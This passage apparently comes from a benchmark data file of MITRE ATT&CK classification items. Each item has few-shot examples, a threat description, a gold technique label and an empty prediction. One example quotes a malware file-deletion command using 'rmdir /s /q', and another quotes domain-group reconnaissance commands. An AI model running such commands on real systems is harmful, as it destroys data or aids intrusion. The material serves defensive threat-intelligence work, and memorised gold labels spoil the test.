UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Bazar has used XOR, RSA2, and RC4 encrypted files.\n\t - T1027: Obfuscated Files or Information\n- Text: Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.\n\t - T1132: Data Encoding\n", + "input": "Derusbi obfuscates C2 traffic with variable 4-byte XOR keys.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The file /tmp/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry\n\t - T1112: Modify Registry\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n", + "input": "PoetRAT has added a registry key in the hive for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.\n\t - T1556.007: Modify Authentication Process - Hybrid Identity\n- Text: AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.\n\t - T1649: Steal or Forge Authentication Certificates\n- Text: No matching sample found for T1556.006\n", + "input": "AADInternals can inject a malicious DLL (`PTASpy`) into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.", + "gold": "- T1556.007: Modify Authentication Process - Hybrid Identity", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variables names were changed for clarity\n\t - T1105: Ingress Tool Transfer\n- Text: has used PowerShell for execution and privilege escalation.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: jRAT has been distributed as HTA files with VBScript.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Meteor has the ability to download additional files for execution on the victim's machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GravityRAT steals files based on an extension list if a USB drive is connected to the system.\n\t - T1025: Data from Removable Media\n- Text: Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1119: Automated Collection\n- Text: QuietSieve can identify and search removable drives for specific file name extensions.\n\t - T1120: Peripheral Device Discovery\n", + "input": "InvisiMole can collect jpeg files from connected MTP devices.", + "gold": "- T1025: Data from Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a backdoor through which remote attackers can obtain data from local systems.\n\t - T1005: Data from Local System\n- Text: has transferred files using the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel.\n\t - T1105: Ingress Tool Transfer\n- Text: Chimera has copied tools between compromised hosts using SMB.\n\t - T1570: Lateral Tool Transfer\n", + "input": "Drovorub can transfer files from the victim machine.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n- Text: Avaddon has decrypted encrypted strings.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Files contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS) flag that indicates the files have been downloaded from the internet (so called \u201cmark-of-the-web\u201d) as reported by Didier Stevens.\n\t - T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass\n", + "input": "EnvyScout can deobfuscate and write malicious ISO files to disk.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques\n\t - T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild\n- Text: APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.\n\t - T1216.001: System Script Proxy Execution - PubPrn\n", + "input": "ROKRAT has used Visual Basic for execution.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EvilBunny has executed C2 commands directly via HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: SideTwist has exfiltrated data over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: has used ports 8060 and 8888 for C2.\n\t - T1571: Non-Standard Port\n", + "input": "SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 used a malware variant called WIDETONE to conduct port scans on the specified subnets.\n\t - T1046: Network Service Discovery\n- Text: RATANKBA runs the \"net view /domain\" and \"net view\" commands.\n\t - T1018: Remote System Discovery\n- Text: In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1595: Active Scanning\n", + "input": "Remsec has a plugin that can perform ARP scanning as well as port scanning.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.\n\t - T1105: Ingress Tool Transfer\n- Text: The hooked WriteFile procedure\u2019s main purpose is to save the file handle of the subject file to write and install another hook in the CloseHandle API function\n\t - T1005: Data from Local System\n- Text: MechaFlounder has the ability to run commands on a compromised host.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Nerex creates a backdoor through which remote attackers can download files onto a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a command to download a file from the C2 server to the victim mobile device's SD card.\n\t - T1105: Ingress Tool Transfer\n- Text: Revenge RAT uses mshta.exe to run malicious scripts on the system.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: The Clambling dropper can use PowerShell to download the malware.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Koadic can download additional files and tools.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.\n\t - T1218.008: System Binary Proxy Execution - Odbcconf\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "Moses Staff has used signed drivers from an open source tool called DiskCryptor to evade detection.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: An downloader establishes SOCKS5 connections for its initial C2.\n\t - T1090: Proxy\n\t - T1095: Non-Application Layer Protocol\n", + "input": "Cardinal RAT contains watchdog functionality that periodically ensures \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" is set to point to its executable.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fast-paced intrusion \u2022 Very stealthy \u2022 Rapidly changing tactics \u2022 Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: PoshC2 has a number of modules that leverage pass the hash for lateral movement.\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n- Text: No matching sample found for T1558\n", + "input": "APT32 successfully gained remote access by using pass the ticket.", + "gold": "- T1550.003: Use Alternate Authentication Material - Pass the Ticket", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kwampirs collects a list of domain groups with the command \"net localgroup /domain\".\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: InvisiMole has a command to list account information on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "OilRig has used \"net group /domain\", \"net group \u201cdomain admins\u201d /domain\", and \"net group \u201cExchange Trusted Subsystem\u201d /domain\" to find domain group permission settings.", + "gold": "- T1069.002: Permission Groups Discovery - Domain Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Calisto collects information on bookmarks from Google Chrome.\n\t - T1217: Browser Information Discovery\n- Text: Aside from stealing credentials from applications, it also steals the following information from several popular web browsers such as Google Chrome, Mozilla Firefox, Internet Explorer, and Microsoft Edge\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: The component KillDisk is capable of deleting Windows Event Logs.\n\t - T1070: Indicator Removal\n", + "input": "Lizar can retrieve browser history and database files.", + "gold": "- T1217: Browser Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n", + "input": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.", + "gold": "- T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can delete files via `C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir /s /q`.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data\n\t - T1041: Exfiltration Over C2 Channel\n- Text: PingPull can collect data from a compromised host.\n\t - T1005: Data from Local System\n", + "input": "AppleSeed can delete files from a compromised host after they are exfiltrated.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used Android backdoors capable of exfiltrating specific files directly from the infected devices.\n\t - T1005: Data from Local System\n- Text: Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.\n\t - T1213: Data from Information Repositories\n- Text: Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.\n\t - T1114.003: Email Collection - Email Forwarding Rule\n", + "input": "LAPSUS$ uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Out1 can copy files and Registry data from compromised hosts.\n\t - T1005: Data from Local System\n- Text: When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1.\n\t - T1132: Data Encoding\n\t - T1041: Exfiltration Over C2 Channel\n- Text: collects the MAC address, computer name, and CPU information.\n\t - T1082: System Information Discovery\n", + "input": "Bisonal has collected information from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aria-body has the ability to execute a process using \"runas\".\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: ZIRCONIUM has used Python-based implants to interact with compromised hosts.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Chimera has copied tools between compromised hosts using SMB.\n\t - T1570: Lateral Tool Transfer\n", + "input": "Turla RPC backdoors have used cmd.exe to execute commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.\n\t - T1027: Obfuscated Files or Information\n- Text: Bazar can hash then resolve API calls at runtime.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: SombRAT can use a custom DGA to generate a subdomain for C2.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", + "input": "Amadey has obfuscated strings such as antivirus vendor names, domains, files, and others.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation\n\t - T1047: Windows Management Instrumentation\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1559.001: Inter-Process Communication - Component Object Model\n\t - T1027: Obfuscated Files or Information\n- Text: StrongPity can use PowerShell to add files to the Windows Defender exclusions list.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Confucius has used PowerShell to execute malicious files and payloads.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network\n\t - T1033: System Owner/User Discovery\n- Text: APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.\n\t - T1119: Automated Collection\n\t - T1560: Archive Collected Data\n- Text: Cuba can enumerate local drives, disk type, and disk free space.\n\t - T1082: System Information Discovery\n", + "input": "Empire can automatically gather the username, domain name, machine name, and other information from a compromised system.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: HiddenWasp downloads a tar compressed archive from a download server to the system.\n\t - T1105: Ingress Tool Transfer\n- Text: Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive\n\t - T1102: Web Service\n", + "input": "DropBook can unarchive data downloaded from the C2 to obtain the payload and persistence modules.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1204.002: User Execution - Malicious File\n- Text: Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: The legitimate application is a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations. When the Kaspersky application is run, it loads a file named msi.dll, which is located within the same directory. The XOR-decode process, which skips zeroes, uses the single-byte key 0x88\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "SideCopy has utilized `mshta.exe` to execute a malicious hta file.", + "gold": "- T1218.005: System Binary Proxy Execution - Mshta", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TSCookie has the ability to discover drive information on the infected host.\n\t - T1083: File and Directory Discovery\n- Text: Sidewinder has configured tools to automatically send collected files to attacker controlled servers.\n\t - T1020: Automated Exfiltration\n- Text: PoshC2 contains modules, such as \"Get-ComputerInfo\", for enumerating common system information.\n\t - T1082: System Information Discovery\n", + "input": "yty gathers information on victim\u2019s drives and has a plugin for document listing.", + "gold": "- 